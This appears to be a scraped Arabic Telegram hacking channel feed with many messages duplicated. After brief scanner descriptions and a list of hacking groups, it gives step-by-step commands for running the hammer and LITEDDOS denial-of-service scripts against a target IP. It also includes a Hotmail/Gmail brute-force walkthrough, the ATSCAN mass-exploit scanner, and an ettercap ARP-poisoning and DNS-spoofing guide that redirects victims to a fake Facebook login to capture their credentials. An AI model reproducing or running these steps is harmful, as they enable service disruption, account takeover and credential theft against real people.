5- اداه Acunetix
هي من بين أهم الأدوات المستخدمة حاليا وبكثرة عند المهتمين بمجال أمن المعلومات وإختبار إختراق تطبيقات الويب، تعمل الأداة علىفحص تطبيقات الويب وإستخراج ثغرات Sql injection & XSS، كما أن الأداة تعمل على مساعدة مختبر الإختراق بالكشف على قوة كلمة مرور الصفحات المراض إختبار إختراقها وتحديد طبيعة الثغرات الأمنية بالتقارير.
هي من بين أهم الأدوات المستخدمة حاليا وبكثرة عند المهتمين بمجال أمن المعلومات وإختبار إختراق تطبيقات الويب، تعمل الأداة علىفحص تطبيقات الويب وإستخراج ثغرات Sql injection & XSS، كما أن الأداة تعمل على مساعدة مختبر الإختراق بالكشف على قوة كلمة مرور الصفحات المراض إختبار إختراقها وتحديد طبيعة الثغرات الأمنية بالتقارير.
8- اداه skipfish
تعتبر أداة skipfishمن أهم أدوات الإستطلاع المخصصة لإختبار إختراق تطبيقات الويب، تعمل هذه الأداة البسيطة عبر عملية الزحف المتكرر (Recursive Crawl) وتقوم بإستغلال نتائج sitemap للوصول إلىثغرة بتطبيقات الويب وإختبار إختراقها.
تعتبر أداة skipfishمن أهم أدوات الإستطلاع المخصصة لإختبار إختراق تطبيقات الويب، تعمل هذه الأداة البسيطة عبر عملية الزحف المتكرر (Recursive Crawl) وتقوم بإستغلال نتائج sitemap للوصول إلىثغرة بتطبيقات الويب وإختبار إختراقها.
اعادة النشر
مجموعه من القنوات و المجموعات المفيدة لتعلم الهكر في التلجرام
1- @Black_hat_islamic
2- @Gaza_Cybergang
3- @Anonymous_ARAB
4- @termuux
5- @Gaza_Cybergang2
6- @Termux_CS
7- @Spider_Team1
8- @PythonP
9- @html_AR
10- @teamlyon25
11- @JAVA_AR
12- @InformationSecurit1
13- @mr_lunixes
14- @sd_anonymous
15- @HACKING_5
16- @Black_Avengers
17- @AnonymusYemenn
18- @Anonymuskill
-------------
1- @Anonymous_syria
2- @Anonymous_Arabic
3- @Black_Hat_Hacker2
4- @HATCK
5- @termux_kali
6- @Python_AR
7- @Anonymous_Sudan
8- @Gaza_Cybergang3
مجموعه من القنوات و المجموعات المفيدة لتعلم الهكر في التلجرام
1- @Black_hat_islamic
2- @Gaza_Cybergang
3- @Anonymous_ARAB
4- @termuux
5- @Gaza_Cybergang2
6- @Termux_CS
7- @Spider_Team1
8- @PythonP
9- @html_AR
10- @teamlyon25
11- @JAVA_AR
12- @InformationSecurit1
13- @mr_lunixes
14- @sd_anonymous
15- @HACKING_5
16- @Black_Avengers
17- @AnonymusYemenn
18- @Anonymuskill
-------------
1- @Anonymous_syria
2- @Anonymous_Arabic
3- @Black_Hat_Hacker2
4- @HATCK
5- @termux_kali
6- @Python_AR
7- @Anonymous_Sudan
8- @Gaza_Cybergang3
مشاركه من الاخ
#Database_hk
مشاركات الاعضاء:
الله يسلمك يـ👈🏼 💙
الاداة devploit مهمتها جمع معلومات عن المواقع وسهلة جدا
لاختبار الاختراق تشتغل على اجهزة الاندرويد على
تطبيق ترمكس - تجلب جميع الثغرات المفتوحة
سواء بالايبي او بالهوست .........
ـــDATABASEـــ
#Database_hk
مشاركات الاعضاء:
الله يسلمك يـ👈🏼 💙
الاداة devploit مهمتها جمع معلومات عن المواقع وسهلة جدا
لاختبار الاختراق تشتغل على اجهزة الاندرويد على
تطبيق ترمكس - تجلب جميع الثغرات المفتوحة
سواء بالايبي او بالهوست .........
ـــDATABASEـــ
Forwarded from مشاركات الاعضاء
مشاركه من #عمر_القحطاني
عن شرح عن المتاحات و كيفيه استخراجها و الي اخرة
عن شرح عن المتاحات و كيفيه استخراجها و الي اخرة
Forwarded from Deleted Account
DDos Attack :
هجمات الحرمان من الخدمات أو هجوم حجب الخدمة(بالإنجليزية: Denial of Service Attacks) هي هجمات تتم عن طريق إغراق المواقع بارسال سيل من البيانات غير اللازمة بشكل كثيف مما يسبب بطء الخدمات أو زحاماً مرورياً بهذه المواقع ويسبب صعوبة وصول المستخدمين لها نظراً لهذا الاكتظاظ .
* هناك العديد من الادوات للقيام بهذا الهجوم ومن احدى الامثلة لدرسنا اليوم هى ادات ( hammer ) :
* طريقة التثبيت والتشغيل :
(1) Apt update & apt upgrade - apt install git
(2) apt-get install python2
(3) git clone https://github.com/cyweb/hammer.git
(4) cd hammer
(5) python hammer.py -s ip -p 80 _t 135
# انتهى الدرس
# اعداد المتدرب ( hamza )
#جزى الله خيرا صاحب القناة لترقيتنا الى التدريب العملى
هجمات الحرمان من الخدمات أو هجوم حجب الخدمة(بالإنجليزية: Denial of Service Attacks) هي هجمات تتم عن طريق إغراق المواقع بارسال سيل من البيانات غير اللازمة بشكل كثيف مما يسبب بطء الخدمات أو زحاماً مرورياً بهذه المواقع ويسبب صعوبة وصول المستخدمين لها نظراً لهذا الاكتظاظ .
* هناك العديد من الادوات للقيام بهذا الهجوم ومن احدى الامثلة لدرسنا اليوم هى ادات ( hammer ) :
* طريقة التثبيت والتشغيل :
(1) Apt update & apt upgrade - apt install git
(2) apt-get install python2
(3) git clone https://github.com/cyweb/hammer.git
(4) cd hammer
(5) python hammer.py -s ip -p 80 _t 135
# انتهى الدرس
# اعداد المتدرب ( hamza )
#جزى الله خيرا صاحب القناة لترقيتنا الى التدريب العملى
GitHub
GitHub - cyweb/hammer: Hammer DDos Script - Python 3
Hammer DDos Script - Python 3. Contribute to cyweb/hammer development by creating an account on GitHub.
Forwarded from ڪٱيت̲و ڪيدّ
sudo suapt-get install git
git clone https://github.com/LionSec/katoolin.git && cp katoolin/katoolin.py
/usr/bin/katoolin
chmod +x /usr/bin/katoolin
sudo katoolin
#كايتو_كيد
git clone https://github.com/LionSec/katoolin.git && cp katoolin/katoolin.py
/usr/bin/katoolin
chmod +x /usr/bin/katoolin
sudo katoolin
#كايتو_كيد
GitHub
GitHub - LionSec/katoolin: Automatically install all Kali linux tools
Automatically install all Kali linux tools. Contribute to LionSec/katoolin development by creating an account on GitHub.
Forwarded from ڪٱيت̲و ڪيدّ
Forwarded from Deleted Account
بسم الله الرحمن الرحيم
درس اليوم ( هجوم الحرمان من الخدمة DDos attack ) :
هجمات الحرمان من الخدمات أو هجوم حجب الخدمة(بالإنجليزية: Denial of Service Attacks) هي هجمات تتم عن طريق إغراق المواقع بارسال سيل من البيانات غير اللازمة بشكل كثيف مما يسبب بطء الخدمات أو زحاماً مرورياً بهذه المواقع ويسبب صعوبة وصول المستخدمين لها نظراً لهذا الاكتظاظ .
* هناك العديد من الادوات للقيام بهذا الهجوم ومن احدى الامثلة لدرسنا اليوم هى ادات ( LITEDDOS ) :
* طريقة التثبيت والتشغيل :
$ apt update
$ apt upgrade
$ pkg install git
KE-EMPAT
$ pkg install python2
$ git clone https://github.com/4L13199/LITEDDOS
$ cd LITEDDOS
$ python2 liteDDOS.py <ip> <port> 100
# انتهى الدرس
# اعداد المتدرب ( hamza )
#جزى الله خيرا صاحب القناة لترقيتنا الى التدريب العملى
درس اليوم ( هجوم الحرمان من الخدمة DDos attack ) :
هجمات الحرمان من الخدمات أو هجوم حجب الخدمة(بالإنجليزية: Denial of Service Attacks) هي هجمات تتم عن طريق إغراق المواقع بارسال سيل من البيانات غير اللازمة بشكل كثيف مما يسبب بطء الخدمات أو زحاماً مرورياً بهذه المواقع ويسبب صعوبة وصول المستخدمين لها نظراً لهذا الاكتظاظ .
* هناك العديد من الادوات للقيام بهذا الهجوم ومن احدى الامثلة لدرسنا اليوم هى ادات ( LITEDDOS ) :
* طريقة التثبيت والتشغيل :
$ apt update
$ apt upgrade
$ pkg install git
KE-EMPAT
$ pkg install python2
$ git clone https://github.com/4L13199/LITEDDOS
$ cd LITEDDOS
$ python2 liteDDOS.py <ip> <port> 100
# انتهى الدرس
# اعداد المتدرب ( hamza )
#جزى الله خيرا صاحب القناة لترقيتنا الى التدريب العملى
GitHub
GitHub - 4L13199/LITEDDOS: This Tool Is Supporting For DDOS Activities, The Way Is Typing Command : $ python2 islddos.py <ip>…
This Tool Is Supporting For DDOS Activities, The Way Is Typing Command : $ python2 islddos.py <ip> <port> <packet> example: $python2 islddos.py 104.27....
Forwarded from DEYAA ..𓂆
شرح أداة Hotmail BruteForce ..🔥
هاي الاداة رح نستخدمها من خلال اداة multitools اللي فيها ادوات تانية غير اداة
Hotmail BruteForce
وخطوات تنزيلها للتيرمكس طبعا
كالتالي ..👇👇👇
نثبت اداة multitools من موقع github
git clone https://github.com/sp1dermanhackeryoutube/multitools.git
cd multitools
cd Multitools
((ملاحظة)) 👈 لاحظوا الامرين الاخيرين متشابهين فقط حرف M بختلف ..
chmod +x install.sh
chmod +x multitools.py
-----
((فائدة)) 👈 الامرين chmod بنقدر نستبدلهم بأمر واحد بدل م نعمل كل واحد على حدى بهاد الامر اللي بخلي كل الملفات باللون الاخضر وتقدر تشغلها على البايثون ..
chmod +x *
------
الان ندخل التالي
./install.sh
واخر خطوة لنفوت عالاداة وهي باستخدام python3
python3 multitools.py
بتضغط Enter مرتين
الان الاداة تثبتت رح نفوت منها على الأداة رقم 2
[2] Hotmail BruteForce
نختار الخيار الاول للتخمين ..
رح يطلب منك مسار ملف التخمين اللي رح يستخدمو .
تاني شي بيطلب الايميل
ورح يبدأ الهجوم متل م هوا مبين بالصور .
((ملاحظة صغيرة))
اذا ما عندك ملف كلمات سر ممكن تنشئه عن طريق الأداة
من الخيار رقم 3 بعد م تفوت على الأداة من الامر
python3 multitools.py
نختار
[3] Wordlist Generator
منها رح يطلب منك شوية معلومات ع اساسها رح يعمل ملف تخمين تقدر تستخدمو للهجوم على الايميل اللي بدك ياا .
الاداة ممكن تستخدمها لل Gmail أيضاا ..❤
.....
بتمنى يكون الشرح كآفي ووآفي
أخوكم // #Deyaa.R
هاي الاداة رح نستخدمها من خلال اداة multitools اللي فيها ادوات تانية غير اداة
Hotmail BruteForce
وخطوات تنزيلها للتيرمكس طبعا
كالتالي ..👇👇👇
نثبت اداة multitools من موقع github
git clone https://github.com/sp1dermanhackeryoutube/multitools.git
cd multitools
cd Multitools
((ملاحظة)) 👈 لاحظوا الامرين الاخيرين متشابهين فقط حرف M بختلف ..
chmod +x install.sh
chmod +x multitools.py
-----
((فائدة)) 👈 الامرين chmod بنقدر نستبدلهم بأمر واحد بدل م نعمل كل واحد على حدى بهاد الامر اللي بخلي كل الملفات باللون الاخضر وتقدر تشغلها على البايثون ..
chmod +x *
------
الان ندخل التالي
./install.sh
واخر خطوة لنفوت عالاداة وهي باستخدام python3
python3 multitools.py
بتضغط Enter مرتين
الان الاداة تثبتت رح نفوت منها على الأداة رقم 2
[2] Hotmail BruteForce
نختار الخيار الاول للتخمين ..
رح يطلب منك مسار ملف التخمين اللي رح يستخدمو .
تاني شي بيطلب الايميل
ورح يبدأ الهجوم متل م هوا مبين بالصور .
((ملاحظة صغيرة))
اذا ما عندك ملف كلمات سر ممكن تنشئه عن طريق الأداة
من الخيار رقم 3 بعد م تفوت على الأداة من الامر
python3 multitools.py
نختار
[3] Wordlist Generator
منها رح يطلب منك شوية معلومات ع اساسها رح يعمل ملف تخمين تقدر تستخدمو للهجوم على الايميل اللي بدك ياا .
الاداة ممكن تستخدمها لل Gmail أيضاا ..❤
.....
بتمنى يكون الشرح كآفي ووآفي
أخوكم // #Deyaa.R
GitHub
GitHub - AnonymousSp1dy/multitools: This is a multihack with Gmail bruteforce, Hotmail Bruteforce and a password generator.
This is a multihack with Gmail bruteforce, Hotmail Bruteforce and a password generator. - AnonymousSp1dy/multitools
Forwarded from ▂▃▄▅▆▇█▓▒░فّخِأُمِﮭ -┆💙♕░▒▓█▇▆▅▄▃▂
*الـ💔ــّωــ✋ـَّلاρٓ ؏ٓـلْيگــــρ*
شرحنا اليوم عن سكربت ATSCAN لبحث عن دوركات والبحث عن مواقع مصابة بثغرات - ATSCAN tool for scan DORKS
ATSCAN Advanced Search / Dork / Mass Exploitation Scanner
Install..
$ pkg install git perl
$ git clone https://github.com/AlisamTechnology/ATSCAN
$ cpan install URI::Escape
$ cpan install HTML::Entities
$ perl atscan.pl -h
Sory friends I m use this video
$ cpan install HTTP::Entities this is wrong
★ Description
● عمليات مسح فورية متعددة.
● الاستغلال الشامل
● استخدام الوكيل.
● وكيل مستخدم عشوائي.
● محرك عشوائي.
● أوامر التنفيذ الشامل الشامل.
● يستغل وقضايا البحث.
● XSS / SQLI / LFI / AFD الماسح الضوئي.
● تصفية مواقع وورد و جملة.
● وورد موضوع والكشف عن البرنامج المساعد.
● البحث عن صفحة المسؤول.
● فك شفرة / تشفير Base64 / MD5
● مسح المنافذ.
● اجمع عناوين IP
● اجمع رسائل البريد الإلكتروني.
● الكشف التلقائي عن الأخطاء.
● الكشف التلقائي عن النماذج.
● الكشف التلقائي سم.
● نشر البيانات.
● مكرر تسلسل تلقائي.
● التحقق من الصحة.
● نشر والحصول على طريقة
● توطين IP
● قضايا واستغلال البحث
● واجهة تفاعلية وعادية.
● والمزيد ...
***********************
Pls like subscribes my channel
***********************
THIS VIDEO IS ONLY FOR EDUCATIONAL PURPOSE DON`T Missus s THIS TUTORIAL....
***********************
Thanks for watching
yours.
Arif-Tech
ariftech
شرحنا اليوم عن سكربت ATSCAN لبحث عن دوركات والبحث عن مواقع مصابة بثغرات - ATSCAN tool for scan DORKS
ATSCAN Advanced Search / Dork / Mass Exploitation Scanner
Install..
$ pkg install git perl
$ git clone https://github.com/AlisamTechnology/ATSCAN
$ cpan install URI::Escape
$ cpan install HTML::Entities
$ perl atscan.pl -h
Sory friends I m use this video
$ cpan install HTTP::Entities this is wrong
★ Description
● عمليات مسح فورية متعددة.
● الاستغلال الشامل
● استخدام الوكيل.
● وكيل مستخدم عشوائي.
● محرك عشوائي.
● أوامر التنفيذ الشامل الشامل.
● يستغل وقضايا البحث.
● XSS / SQLI / LFI / AFD الماسح الضوئي.
● تصفية مواقع وورد و جملة.
● وورد موضوع والكشف عن البرنامج المساعد.
● البحث عن صفحة المسؤول.
● فك شفرة / تشفير Base64 / MD5
● مسح المنافذ.
● اجمع عناوين IP
● اجمع رسائل البريد الإلكتروني.
● الكشف التلقائي عن الأخطاء.
● الكشف التلقائي عن النماذج.
● الكشف التلقائي سم.
● نشر البيانات.
● مكرر تسلسل تلقائي.
● التحقق من الصحة.
● نشر والحصول على طريقة
● توطين IP
● قضايا واستغلال البحث
● واجهة تفاعلية وعادية.
● والمزيد ...
***********************
Pls like subscribes my channel
***********************
THIS VIDEO IS ONLY FOR EDUCATIONAL PURPOSE DON`T Missus s THIS TUTORIAL....
***********************
Thanks for watching
yours.
Arif-Tech
ariftech
GitHub
GitHub - AlisamTechnology/ATSCAN: Advanced dork Search & Mass Exploit Scanner
Advanced dork Search & Mass Exploit Scanner. Contribute to AlisamTechnology/ATSCAN development by creating an account on GitHub.
Forwarded from Danial Silva
اليوم سوف أقوم بشرح عن أداة تحليل البروتوكولات وكيف يتم تحليلها واستغلالها
بدايةً سوف نتكلم عن البروتوكول وهو...
هو بروتوكول الاتصال الأساسي في حزمة بروتوكولات الإنترنت ويُشكّل الأساس الذي تعتمد عليه عمليّة توجيه الرزم (Routing) ضمن الشبكة، ويسمح ذلك بالاتصال بين الشبكات المُختلفة، وهذا هو جوهر شبكة الإنترنت.
اي أنهُ بإختصار مثل الوسيط بينك وبين الشبكة حتى تستطيع الحصول على ما تُريد وهُناك العديد من البروتوكولات ولكل بروتوكول مهمة خاصّة به....
لنبدأ الشرح...
#Tools :
+ Wireshark
+ Bettercap
#Steps :
1- سوف نقوم بتشغيل أداة تحليل البروتوكولات وهكذا سوف يكون تم إجتياز أول شئ من الشرح....
# لتشغيل الأداة يوجد طريقتين....
- كتابة wireshark داخل التيرمنال
- نذهب إلى
Application => => wireshark
# سوف تظهر لنا واجهة بها إختيار interface الخاص بنا يمكنك إختيار eth0 أو wlan0 حسب الذي تعمل به
# سوف تظهر لنا نافذة الأداة ومن هُنا نبدأ في تحليل البروتوكولات.....
لنتابع معاً....
2- بعد أن تظهر لنا نافذة الأداة سيظهر لنا العديد من الأشياء ولكن بالطبع لن نفهم شئ لذا لنفهم مع بعض كِل شئ...
سوف أترك صورة توّضح ما أتكلم عنه في الأسفل وسوف تجدوا أرقام وهي التي توّضح ما أتكلم عنه هُنا....
#1- ستجد كلمة مخفية مثل هذه....
Apply a display filter __ <Ctrl-/>
وهي تعني فلترة الأشياء التي تظهر لك وهي مثل موجه الأوامر الخاص بالأداة وسنفهم هذا لاحقاً....
#2- شريط المهام وبه كُلاً من....
No. Time
وهي تعني برقم العملية وبجانبه الوقت وتظهر لك بالشكل التالي...
1 0.000000000
2 0.157298626
Source
وهي تعني بالمصدر الذي يأتي منهُ المعلومات والمقصود بها الأي بي الداخلي ويكون مثل هذا....
192.168.1.4
Destination
ستجد العديد من الأيبيات ولكن ستجد أيضاً الأي بي الذي قام بالإتصال عبرهُ...
Protocol
وهذه تعني البروتوكول المُستخدم وستجد العديد من البروتوكولات مثل....
DNS
UDP
TCP
info
وهذه تعني إتصل بماذا؟....
فمثلاً إذا كان البروتوكول الذي قُمنا باستغلاله هو DNS ستجد بعض الأشياء وبالنهاية إسم الموقع أو DNS الخاص بالشئ الذي إتصل به....
حسناً لنرى ما يُمكننا فعله....
سنقوم بفلترة الأشياء عبر الذي شرحته أول شئ الذي يُسمى filter...
سنقوم بوضع الشئ الذي نقوم بتحليل مثل البروتوكول وسوف نستخدم بروتوكول DNS ونقوم بتحليله لنرى كيف ذلك....
نكتب بالفراغ هذا فقط ثلاثة أحرف وهما...
# dns
وعندما يتصل أي أحد داخل الشبكة بأي شئ عبر هذا البروتوكول ستجد الأي بي الخاص به بالأهداف التي قام بزيارتها وكُل شئ وهكذا قد إنتهينا من تحليل البروتوكولات ويمكنك إضافة أي بروتوكول تُريده بدل dns ويمكنك إضافة أي بي مُعين أيضاً عبر كتابة الأمر التالي...
# ip.addr == الأي بي الذي تُريده
وإذا أردت تحليل بروتوكول مُعين نكتب التالي....
# ip.addr == الأي بي الذي تُريده && dns
أو يُمكنك إختيار البروتوكول الذي تُريده...
3- نأتي لكيفية الإستغلال وهُنا سوف نستخدم أداة ettercap....
# لتشغيل الأداة يوجد طريقتين أيضاً
ولكن سوف نستخدم الطريقة الأتية...
# Application => Sniff & Spoof => ettercap-gui
ولكن قبل هذا يجب علينا تعديل بعض الأشياء حتى تعمل معنا الأداة جيداً....
نكتب الأمر التالي داخل التيرمنال...
# gedit /etc/ettercap/etter.conf
ستجد كلمتي
ec_uid ==> x
ec_gid ==> x
وهذا الحرف يعني رقم عليك بتغييرها إلى رقم 0 هكذا....
ec_uid ==> 0
ec_gid ==> 0
وقُم بالبحث قليلاً عن كلمة root ستجد الأتي....
#---------------
# Linux
#---------------
# ,,,,,,,, iptables
وستجد الكلمات التالية
#redir_command_on
#redir_command_off
قُم بحذف علامة الهاش هكذا....
redir_command_on
redir_command_off
نقوم بالتعديل على ملف dns حتى نقوم بعمل إعادة توجيه للرابط الذي نُريده...
سوف أُكمل وكأننا سوف نقوم بإستغلال dns
لإعادة التوجيه لرابط خبيث به تسجيل دخول إلى فيسبوك ولكي نفعل هذا سنقوم بعمل إضافة dns
الخاص بموقع فيسبوك داخل الملف وبجانبه سنضع أي بي الرابط الخاص بنا...
نكتب التالي بالتيرمنال...
# gedit /etc/ettercap/etter.dns
سنجد كلمة microsoft sucks
وبعدها روابط مثل...
microsoft.com
*.microsoft.com
www.microsoft.com
نقوم بتغيير microsoft
إلى الرابط الذي نُريد عمل تجسس عليه
وبجانبه سنجد أي بي سنقوم بتغييرها إلى أي بي أو هوست الرابط....
الأن سنبدأ الإستغلال...
# بعد تشغيل الأداة نختار
# Sniff
نختار
Unfied sniffing
# Hosts
نختار
scan for hosts
# Hosts
نختار منها Hosts list
ليظهر لنا الأهداف
وبعد أن نختار الهدف نقوم بتحديده
Add to Target 2
ونقوم بتحديد أي بي الراوتر
Add to Target 1
# Target
نختار
Current Targets
# Mitm
نختار
Arp Poisoning
ونختار
بدايةً سوف نتكلم عن البروتوكول وهو...
هو بروتوكول الاتصال الأساسي في حزمة بروتوكولات الإنترنت ويُشكّل الأساس الذي تعتمد عليه عمليّة توجيه الرزم (Routing) ضمن الشبكة، ويسمح ذلك بالاتصال بين الشبكات المُختلفة، وهذا هو جوهر شبكة الإنترنت.
اي أنهُ بإختصار مثل الوسيط بينك وبين الشبكة حتى تستطيع الحصول على ما تُريد وهُناك العديد من البروتوكولات ولكل بروتوكول مهمة خاصّة به....
لنبدأ الشرح...
#Tools :
+ Wireshark
+ Bettercap
#Steps :
1- سوف نقوم بتشغيل أداة تحليل البروتوكولات وهكذا سوف يكون تم إجتياز أول شئ من الشرح....
# لتشغيل الأداة يوجد طريقتين....
- كتابة wireshark داخل التيرمنال
- نذهب إلى
Application => => wireshark
# سوف تظهر لنا واجهة بها إختيار interface الخاص بنا يمكنك إختيار eth0 أو wlan0 حسب الذي تعمل به
# سوف تظهر لنا نافذة الأداة ومن هُنا نبدأ في تحليل البروتوكولات.....
لنتابع معاً....
2- بعد أن تظهر لنا نافذة الأداة سيظهر لنا العديد من الأشياء ولكن بالطبع لن نفهم شئ لذا لنفهم مع بعض كِل شئ...
سوف أترك صورة توّضح ما أتكلم عنه في الأسفل وسوف تجدوا أرقام وهي التي توّضح ما أتكلم عنه هُنا....
#1- ستجد كلمة مخفية مثل هذه....
Apply a display filter __ <Ctrl-/>
وهي تعني فلترة الأشياء التي تظهر لك وهي مثل موجه الأوامر الخاص بالأداة وسنفهم هذا لاحقاً....
#2- شريط المهام وبه كُلاً من....
No. Time
وهي تعني برقم العملية وبجانبه الوقت وتظهر لك بالشكل التالي...
1 0.000000000
2 0.157298626
Source
وهي تعني بالمصدر الذي يأتي منهُ المعلومات والمقصود بها الأي بي الداخلي ويكون مثل هذا....
192.168.1.4
Destination
ستجد العديد من الأيبيات ولكن ستجد أيضاً الأي بي الذي قام بالإتصال عبرهُ...
Protocol
وهذه تعني البروتوكول المُستخدم وستجد العديد من البروتوكولات مثل....
DNS
UDP
TCP
info
وهذه تعني إتصل بماذا؟....
فمثلاً إذا كان البروتوكول الذي قُمنا باستغلاله هو DNS ستجد بعض الأشياء وبالنهاية إسم الموقع أو DNS الخاص بالشئ الذي إتصل به....
حسناً لنرى ما يُمكننا فعله....
سنقوم بفلترة الأشياء عبر الذي شرحته أول شئ الذي يُسمى filter...
سنقوم بوضع الشئ الذي نقوم بتحليل مثل البروتوكول وسوف نستخدم بروتوكول DNS ونقوم بتحليله لنرى كيف ذلك....
نكتب بالفراغ هذا فقط ثلاثة أحرف وهما...
# dns
وعندما يتصل أي أحد داخل الشبكة بأي شئ عبر هذا البروتوكول ستجد الأي بي الخاص به بالأهداف التي قام بزيارتها وكُل شئ وهكذا قد إنتهينا من تحليل البروتوكولات ويمكنك إضافة أي بروتوكول تُريده بدل dns ويمكنك إضافة أي بي مُعين أيضاً عبر كتابة الأمر التالي...
# ip.addr == الأي بي الذي تُريده
وإذا أردت تحليل بروتوكول مُعين نكتب التالي....
# ip.addr == الأي بي الذي تُريده && dns
أو يُمكنك إختيار البروتوكول الذي تُريده...
3- نأتي لكيفية الإستغلال وهُنا سوف نستخدم أداة ettercap....
# لتشغيل الأداة يوجد طريقتين أيضاً
ولكن سوف نستخدم الطريقة الأتية...
# Application => Sniff & Spoof => ettercap-gui
ولكن قبل هذا يجب علينا تعديل بعض الأشياء حتى تعمل معنا الأداة جيداً....
نكتب الأمر التالي داخل التيرمنال...
# gedit /etc/ettercap/etter.conf
ستجد كلمتي
ec_uid ==> x
ec_gid ==> x
وهذا الحرف يعني رقم عليك بتغييرها إلى رقم 0 هكذا....
ec_uid ==> 0
ec_gid ==> 0
وقُم بالبحث قليلاً عن كلمة root ستجد الأتي....
#---------------
# Linux
#---------------
# ,,,,,,,, iptables
وستجد الكلمات التالية
#redir_command_on
#redir_command_off
قُم بحذف علامة الهاش هكذا....
redir_command_on
redir_command_off
نقوم بالتعديل على ملف dns حتى نقوم بعمل إعادة توجيه للرابط الذي نُريده...
سوف أُكمل وكأننا سوف نقوم بإستغلال dns
لإعادة التوجيه لرابط خبيث به تسجيل دخول إلى فيسبوك ولكي نفعل هذا سنقوم بعمل إضافة dns
الخاص بموقع فيسبوك داخل الملف وبجانبه سنضع أي بي الرابط الخاص بنا...
نكتب التالي بالتيرمنال...
# gedit /etc/ettercap/etter.dns
سنجد كلمة microsoft sucks
وبعدها روابط مثل...
microsoft.com
*.microsoft.com
www.microsoft.com
نقوم بتغيير microsoft
إلى الرابط الذي نُريد عمل تجسس عليه
وبجانبه سنجد أي بي سنقوم بتغييرها إلى أي بي أو هوست الرابط....
الأن سنبدأ الإستغلال...
# بعد تشغيل الأداة نختار
# Sniff
نختار
Unfied sniffing
# Hosts
نختار
scan for hosts
# Hosts
نختار منها Hosts list
ليظهر لنا الأهداف
وبعد أن نختار الهدف نقوم بتحديده
Add to Target 2
ونقوم بتحديد أي بي الراوتر
Add to Target 1
# Target
نختار
Current Targets
# Mitm
نختار
Arp Poisoning
ونختار
Forwarded from Danial Silva
بعدها
✔️ Sniff remote connections.
# Plugins
ونختار
dns_spoof
# Sniff
نختار
Start Sniffing
وعندما يتم دخول الضحية إلى موقع فيسبوك سيجد صفحة تسجيل الدخول خاصّتك وهُنا ينتهي الشرح وهذا شئ بسيط بالنسبة لإستغلال مثل هذه البروتوكولات فيُمكنك فعل كُل شئ تُريده
وإن كان هُناك توفيق فمن الله وإذا كان خطأ فمني ومن الشيطان...
# هذا الشرح إهداء إلى كُل من ...
#CS_Princess
#VenomX_Team
# ومُقدم من....
#CS_Princess
#CrTVenom
✔️ Sniff remote connections.
# Plugins
ونختار
dns_spoof
# Sniff
نختار
Start Sniffing
وعندما يتم دخول الضحية إلى موقع فيسبوك سيجد صفحة تسجيل الدخول خاصّتك وهُنا ينتهي الشرح وهذا شئ بسيط بالنسبة لإستغلال مثل هذه البروتوكولات فيُمكنك فعل كُل شئ تُريده
وإن كان هُناك توفيق فمن الله وإذا كان خطأ فمني ومن الشيطان...
# هذا الشرح إهداء إلى كُل من ...
#CS_Princess
#VenomX_Team
# ومُقدم من....
#CS_Princess
#CrTVenom